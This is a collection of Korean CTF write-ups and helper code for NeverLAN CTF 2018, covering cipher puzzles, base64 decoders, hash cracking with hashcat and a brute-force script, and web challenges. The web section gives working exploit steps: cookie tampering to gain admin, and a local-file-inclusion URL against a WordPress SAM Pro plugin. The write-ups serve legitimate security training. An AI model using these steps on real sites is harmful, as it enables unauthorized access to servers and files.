--------------------------------------------------------------------------------
 1 | # Story Time! (200)
 2 | 
 3 | ~~~
 4 | Don't Hate me 문제를 푼는 도중
 5 | dcode.fr를 돌아다니다가 Story Time!에서 본 Chipher랑 비슷하게 생긴 Decoder를 찾았고
 6 | Story Time의 Cipher text를 올려서 돌려보니 flag가 나왔다.
 7 | (https://www.dcode.fr/gold-bug-poe)
 8 | 
 9 | 
10 | CAPTAI KIDD USED THE GOLD BUG CIPHER TO HIDE THE LOCATIO OF HIS TREASURE I A STORY WRITTE BY EDGAR ALLA POE I FLAG IS PIRATESANDDAGGERS
11 | 
12 | FLAG{PIRATESANDDAGGERS}
13 | ~~~


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/That's-a-big-file/base64.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdlib.h>
  3 | #include <string.h>
  4 | #include <time.h>
  5 | 
  6 | char str[900000000];
  7 | char tmp[900000000];
  8 | 
  9 | static const char MimeBase64[] = {
 10 |     'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
 11 |     'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
 12 |     'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
 13 |     'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
 14 |     'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
 15 |     'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
 16 |     'w', 'x', 'y', 'z', '0', '1', '2', '3',
 17 |     '4', '5', '6', '7', '8', '9', '+', '/'
 18 | };
 19 | 
 20 | static int DecodeMimeBase64[256] = {
 21 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* 00-0F */
 22 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* 10-1F */
 23 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,  /* 20-2F */
 24 |     52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,  /* 30-3F */
 25 |     -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,  /* 40-4F */
 26 |     15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,  /* 50-5F */
 27 |     -1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,  /* 60-6F */
 28 |     41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1,  /* 70-7F */
 29 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* 80-8F */
 30 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* 90-9F */
 31 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* A0-AF */
 32 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* B0-BF */
 33 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* C0-CF */
 34 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* D0-DF */
 35 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,  /* E0-EF */
 36 |     -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1   /* F0-FF */
 37 | };
 38 | 
 39 | typedef union{
 40 |     struct{
 41 |         unsigned char c1,c2,c3;
 42 |     };
 43 |     struct{
 44 |         unsigned int e1:6,e2:6,e3:6,e4:6;
 45 |     };
 46 | } BF;
 47 | 
 48 | void base64e(char *src, char *result, int length){
 49 |     int i, j = 0;
 50 |     BF temp;
 51 | 
 52 |     for(i = 0 ; i < length ; i = i+3, j = j+4){
 53 |         temp.c3 = src[i];
 54 |         if((i+1) > length) temp.c2 = 0x00;
 55 |         else temp.c2 = src[i+1];
 56 |         if((i+2) > length) temp.c1 = 0x00;
 57 |         else temp.c1 = src[i+2];
 58 | 
 59 |         result[j]   = MimeBase64[temp.e4];
 60 |         result[j+1] = MimeBase64[temp.e3];
 61 |         result[j+2] = MimeBase64[temp.e2];
 62 |         result[j+3] = MimeBase64[temp.e1];
 63 | 
 64 |         if((i+2) > length) result[j+2] = '=';
 65 |         if((i+3) > length) result[j+3] = '=';
 66 |     }
 67 | }
 68 | 
 69 | void base64d(char *src, char *result, int *length){
 70 |     int i, j = 0, src_length, blank = 0;
 71 |     BF temp;
 72 | 
 73 |     src_length = strlen(src);
 74 | 
 75 |     for(i = 0 ; i < src_length ; i = i+4, j = j+3){
 76 |         temp.e4 = DecodeMimeBase64[src[i]];
 77 |         temp.e3 = DecodeMimeBase64[src[i+1]];
 78 |         if(src[i+2] == '='){
 79 |             temp.e2 = 0x00;
 80 |             blank++;
 81 |         } else temp.e2 = DecodeMimeBase64[src[i+2]];
 82 |         if(src[i+3] == '='){
 83 |             temp.e1 = 0x00;
 84 |             blank++;
 85 |         } else temp.e1 = DecodeMimeBase64[src[i+3]];
 86 | 
 87 |         result[j]   = temp.c3;
 88 |         result[j+1] = temp.c2;
 89 |         result[j+2] = temp.c1;
 90 |     }
 91 |     *length = j-blank;
 92 | }
 93 | 
 94 | int main(void){
 95 |     int src_size, x;
 96 |     struct timespec start,end;
 97 |     char *result;
 98 |     FILE *read, *output;
 99 | 	
100 | 	printf("NeverLAN CTF - That's a big file\n");
101 | 	printf("base64 decoder Edited by munsiwoo\n");
102 | 	
103 | 	read = fopen("ThatsBig.txt", "r");
104 | 	fread( str, 1, 798281684, read);
105 | 	fclose(read);
106 | 
107 |     src_size = strlen(str);
108 |     result = (char *)malloc(3 * (src_size / 4));
109 |     base64d(str, result, &src_size);
110 |     strcpy(tmp, result);
111 |     free(result);
112 |   
113 |   	for(x=0; x<20; ++x) {
114 |   		src_size = strlen(tmp);
115 | 		result = (char *)malloc(3 * (src_size / 4));
116 | 		base64d(tmp, result, &src_size);
117 | 		strcpy(tmp, result);
118 | 	    free(result);
119 | 	    
120 | 	    printf("%d,", x);
121 | 	}
122 | 	
123 | 	src_size = strlen(tmp);
124 | 	result = (char *)malloc(3 * (src_size / 4));
125 | 	base64d(tmp, result, &src_size);
126 | 	strcpy(tmp, result);
127 | 	
128 | 	printf("%d\n", x);
129 | 	printf("%s\n", result);
130 |     
131 |     output = fopen("Output.txt", "wb");
132 |     fputs(result, output);
133 |     fclose(output);
134 |     
135 |     free(result);
136 |     
137 |     return 0;
138 | }
139 | 


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/That's-a-big-file/decoder.py:
--------------------------------------------------------------------------------
 1 | from base64 import decodestring as base64decode
 2 | 
 3 | loadfile = open("Output.txt", 'r')
 4 | readfile = loadfile.read()
 5 | # made by munsiwoo
 6 | 
 7 | tmp = base64decode(str(readfile).encode()).decode()
 8 | result = tmp
 9 | 
10 | for x in range(36) :
11 | 	tmp = base64decode(str(result).encode()).decode()
12 | 	result = tmp
13 | 
14 | print(result)
15 | 


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Cryptography/dot-dot-dashish/README.md:
--------------------------------------------------------------------------------
 1 | # dot-dot-dashish (300)
 2 | 
 3 | ~~~
 4 | https://www.dcode.fr/morbit-cipher
 5 | 
 6 | 97316965853979963985499179367294639394818957686961793985758977285755179717668146351797581542771573123768175949171639399579635857539139371589197916944146353461537149577161797698979
 7 | 
 8 | KEYWORD OF 9 LETTERS : NEVERLANC
 9 | 
10 | 
11 | EVEN MORSE CODE HAD ENCRYPTION THROUGH OUT HISTORY HUMAN HAVE LOVED SECRETS YOUR FLAG IS ENCRYPTALLTHETHINGS
12 | 
13 | 
14 | FLAG IS ENCRYPTALLTHETHINGS
15 | 
16 | flag{encryptallthethings}
17 | ~~~


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/InterWeb/README.md:
--------------------------------------------------------------------------------
 1 | # Interweb Write-ups (1100pt)
 2 | 
 3 | ### ajax_not_soap (100)
 4 | ~~~
 5 | webhooks/get_username.php 로 이동하면 MrClean이란 username을 알려준다.
 6 | MrClean을 webhooks/get_pass.php?username=MrClean 이렇게 get_pass.php에 대입해주면
 7 | flag가 나온다. flag{hj38dsjk324nkeasd9}
 8 | ~~~
 9 | 
10 | ### ajax_not_borax (200)
11 | ~~~
12 | webhooks/get_username.php 로 이동하면 c5644ca91d1307779ed493c4dedfdcb7 라는 해시값이 나온다.
13 | 이걸 hashkiller에 놓고 돌리면 tideade가 나오고 webhooks/get_pass.php?username=tideade 이렇게 대입해주면
14 | base64로 인코딩된 flag가 나온다. ZmxhZ3tzZDkwSjBkbkxLSjFsczlISmVkfQ==
15 | flag{sd90J0dnLKJ1ls9HJed}
16 | ~~~
17 | 
18 | ### the_red_or_blue_pill (100)
19 | ~~~
20 | 접속하면 red pill하고 blue pill을 선택할 수 있다.
21 | red pill을 누르면 ?red 파라미터가, blue pill을 먹으면 ?blue 파라미터가 생기는데
22 | 밑에 "red pill하고 blue pill을 동시에 먹으면 안되냐?"라는 지문을 보고
23 | red 파라미터와 blue 파라미터를 동시에 주었더니 flag가 나왔다. 
24 | /?red&blue
25 | # Well you chose option 3 which clearly was stated not to do. Good job! :)
26 | # flag{breaking_the_matrix...I_like_it!}
27 | ~~~
28 | 
29 | ### tik-tik-boom (300)
30 | ~~~
31 | 접속에서 html을 보면 username and password did not match: admin hahahaN0one1s3verGett1ngTh1sp@ssw0rd
32 | 라는 문구가 눈에 띈다, cookie에 username, password라는 cookie가 있는데
33 | 각각 username=admin;password=hahahaN0one1s3verGett1ngTh1sp@ssw0rd; 이렇게 바꿔주면 flag가 나온다.
34 | 단 *시 23분 59초에 새로고침해야 flag가 나온다.
35 | ~~~
36 | 
37 | ### Das_blog (200)
38 | ~~~
39 | 로그인 페이지에서 주석처리된 테스트 계정을 확인할 수 있다.
40 | 이 테스트 계정으로 로그인하면 permissions=user라는 쿠키 세션이 생기는데
41 | permissions을 admin으로 바꾸고 최상위 디렉토리로 이동하면 flag를 얻을 수 있다.
42 | 
43 | flag{C00ki3s_c4n_b33_ch4ng3d_?}
44 | ~~~
45 | 
46 | ### What the LFI? (200)
47 | ~~~
48 | 워드프레스에서 발생하는 LFI 취약점을 다루는 문제다.
49 | wpscan 도구를 사용해서 SAM Pro에서 발생하는 LFI 존재를 알 수 있었고
50 | "wordpress SAM Pro LFI" 키워드로 검색해보니
51 | /wp-content/plugins/sam-pro-free/sam-pro-ajax-admin.php 에서 LFI가 발생한다는 것을 알았다.
52 | 
53 | ref: https://www.pluginvulnerabilities.com/2016/10/28/local-file-inclusion-lfi-vulnerability-in-sam-pro-free-edition/
54 | 
55 | 위 게시물을 확인할 수 있었고 해당 게시물을 토대로 공격하여 flag를 획득했다.
56 | http://54.201.224.15:14099/wp-content/plugins/sam-pro-free/sam-pro-ajax-admin.php?action=NA&wap=L3Zhci93d3cvYmxhaC5waHA=
57 | 
58 | flag{dont_include_files_derived_from_user_input_kthx_bai}
59 | ~~~


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/InterWeb/das-blog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/InterWeb/das-blog.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/InterWeb/wpscan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/InterWeb/wpscan.png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/Ending!=Hash/wireshark(flag).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/Ending!=Hash/wireshark(flag).png


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/README.md:
--------------------------------------------------------------------------------
 1 | # SHA-1 (200)
 2 | 
 3 | ~~~
 4 | > ./hashcat32.exe hash.txt -a 3 -m 100 ?d?l?l?u?l?l?l?l
 5 | > ./hashcat32.exe hash.txt -a 3 -m 100 ?d?l?l?u?l?l?l?l --show
 6 | ~~~
 7 | 
 8 | 05d3693c0781227771b97a9e3cf972d44c2d4439:1stOrder
 9 | 
10 | flag{1stOrder}


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/description.txt:
--------------------------------------------------------------------------------
1 | Name: SHA-1
2 | 
3 | Author: bashninja
4 | 
5 | Description: We found a password that might be useful, but it's currently hashed. Can you crack the hash?
6 | 
7 | We know the first character is a digit, but that's it.
8 | 
9 | 05d3693c0781227771b97a9e3cf972d44c2d4439


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed(python-script)/__pycache__/brute.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed(python-script)/__pycache__/brute.cpython-36.pyc


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed(python-script)/brute.py:
--------------------------------------------------------------------------------
 1 | from hashlib import sha1
 2 | 
 3 | 
 4 | shashasha = '05d3693c0781227771b97a9e3cf972d44c2d4439'
 5 | # hash = sha1([0-9][a-z0-9][a-z0-9][A-Z][a-z0-9])
 6 | 
 7 | table = '0123456789'
 8 | table += 'abcdefghijklmnopqrstuvwxyz'
 9 | table += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
10 | 
11 | 
12 | for a in table[:10] :
13 | 	for b in table[:36] :
14 | 		for c in table[:36] :
15 | 			for d in table[36:] :
16 | 				compare = str(sha1((a+b+c+d).encode()).hexdigest())
17 | 				#print(compare+" : "+str(a+b+c+d+e+f+g))
18 | 				if(compare == shashasha) :
19 | 					print(a+b+c+d)
20 | 					break
21 | 
22 | 
23 | 
24 | 
25 | """
26 | print(hashlib.sha1(b"0bcA").hexdigest())
27 | print(hashlib.sha1(a.encode()).hexdigest())
28 | print(hashlib.sha1(b"1bcB").hexdigest())
29 | print(hashlib.sha1(b"2bcC").hexdigest())
30 | print(hashlib.sha1(b"3bcD").hexdigest())
31 | print(hashlib.sha1(b"3baD").hexdigest())
32 | print(hashlib.sha1(b"3b3D").hexdigest())
33 | print(hashlib.sha1(b"4bcE").hexdigest())
34 | print(hashlib.sha1(b"5bcF").hexdigest())
35 | """


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed_bruteforce/__pycache__/brute.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed_bruteforce/__pycache__/brute.cpython-36.pyc


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/failed_bruteforce/brute.py:
--------------------------------------------------------------------------------
 1 | from hashlib import sha1
 2 | 
 3 | 
 4 | shashasha = '05d3693c0781227771b97a9e3cf972d44c2d4439'
 5 | # hash = sha1([0-9][a-z0-9][a-z0-9][A-Z][a-z0-9])
 6 | 
 7 | table = '0123456789'
 8 | table += 'abcdefghijklmnopqrstuvwxyz'
 9 | table += 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
10 | 
11 | 
12 | for a in table[:10] :
13 | 	for b in table[:36] :
14 | 		for c in table[:36] :
15 | 			for d in table[36:] :
16 | 				compare = str(sha1((a+b+c+d).encode()).hexdigest())
17 | 				#print(compare+" : "+str(a+b+c+d+e+f+g))
18 | 				if(compare == shashasha) :
19 | 					print(a+b+c+d)
20 | 					break
21 | 
22 | 
23 | 
24 | 
25 | """
26 | print(hashlib.sha1(b"0bcA").hexdigest())
27 | print(hashlib.sha1(a.encode()).hexdigest())
28 | print(hashlib.sha1(b"1bcB").hexdigest())
29 | print(hashlib.sha1(b"2bcC").hexdigest())
30 | print(hashlib.sha1(b"3bcD").hexdigest())
31 | print(hashlib.sha1(b"3baD").hexdigest())
32 | print(hashlib.sha1(b"3b3D").hexdigest())
33 | print(hashlib.sha1(b"4bcE").hexdigest())
34 | print(hashlib.sha1(b"5bcF").hexdigest())
35 | """


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hash.txt:
--------------------------------------------------------------------------------
1 | 05d3693c0781227771b97a9e3cf972d44c2d4439


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_full.charset:
--------------------------------------------------------------------------------
1 | 01020407080b0d0e10131516191a1c1f20232526292a2c2f31323437383b3d3e40434546494a4c4f51525457585b5d5e61626467686b6d6e70737576797a7c7f80838586898a8c8f91929497989b9d9ea1a2a4a7a8abadaeb0b3b5b6b9babcbfc1c2c4c7c8cbcdced0d3d5d6d9dadcdfe0e3e5e6e9eaeceff1f2f4f7f8fbfdfe


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/DES_alpha.charset:
--------------------------------------------------------------------------------
1 | abadaebabcbfcbcdcedadcdfeaeceffbfdfe


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/DES_numeral.charset:
--------------------------------------------------------------------------------
1 | 0102040708101315161920232526293132343738404345464951525457586162646768707375767980838586899192949798


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_0.charset:
--------------------------------------------------------------------------------
1 | 01020407080b0d0e


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_1.charset:
--------------------------------------------------------------------------------
1 | 10131516191a1c1f


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_2.charset:
--------------------------------------------------------------------------------
1 | 20232526292a2c2f


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_3.charset:
--------------------------------------------------------------------------------
1 | 31323437383b3d3e


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_4.charset:
--------------------------------------------------------------------------------
1 | 40434546494a4c4f


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_5.charset:
--------------------------------------------------------------------------------
1 | 51525457585b5d5e


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_6.charset:
--------------------------------------------------------------------------------
1 | 61626467686b6d6e


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_7.charset:
--------------------------------------------------------------------------------
1 | 70737576797a7c7f


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_8.charset:
--------------------------------------------------------------------------------
1 | 80838586898a8c8f


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_9.charset:
--------------------------------------------------------------------------------
1 | 91929497989b9d9e


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_A.charset:
--------------------------------------------------------------------------------
1 | a1a2a4a7a8abadae


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_B.charset:
--------------------------------------------------------------------------------
1 | b0b3b5b6b9babcbf


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_C.charset:
--------------------------------------------------------------------------------
1 | c1c2c4c7c8cbcdce


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_D.charset:
--------------------------------------------------------------------------------
1 | d0d3d5d6d9dadcdf


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_E.charset:
--------------------------------------------------------------------------------
1 | e0e3e5e6e9eaecef


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/DES_special/multiple_nodes/DES_portion_F.charset:
--------------------------------------------------------------------------------
1 | f1f2f4f7f8fbfdfe


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Bulgarian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Bulgarian.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Castilian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Castilian.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Catalan.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Catalan.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/English.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/English.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/French.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/French.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/German.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/German.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Greek.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Greek.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/GreekPolytonic.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/GreekPolytonic.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Italian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Italian.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Lithuanian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Lithuanian.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Polish.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Polish.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Portuguese.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Portuguese.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Russian.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Russian.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Slovak.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Slovak.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Spanish.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/combined/Spanish.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_ISO-8859-15-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_cp1252-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Castilian/es-ES_cp1252-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-1-special.hcchr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-write-ups/eea658aa64209e2a9b1d11ed54df792ed87d8088/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-1-special.hcchr


--------------------------------------------------------------------------------
/2018/NeverLAN-CTF(2018)/Passwords/SHA-1/hashcat-4.1.0/charsets/special/Catalan/ca_ISO-8859-15-special.hcchr:
--------------------------------------------------------------------------------
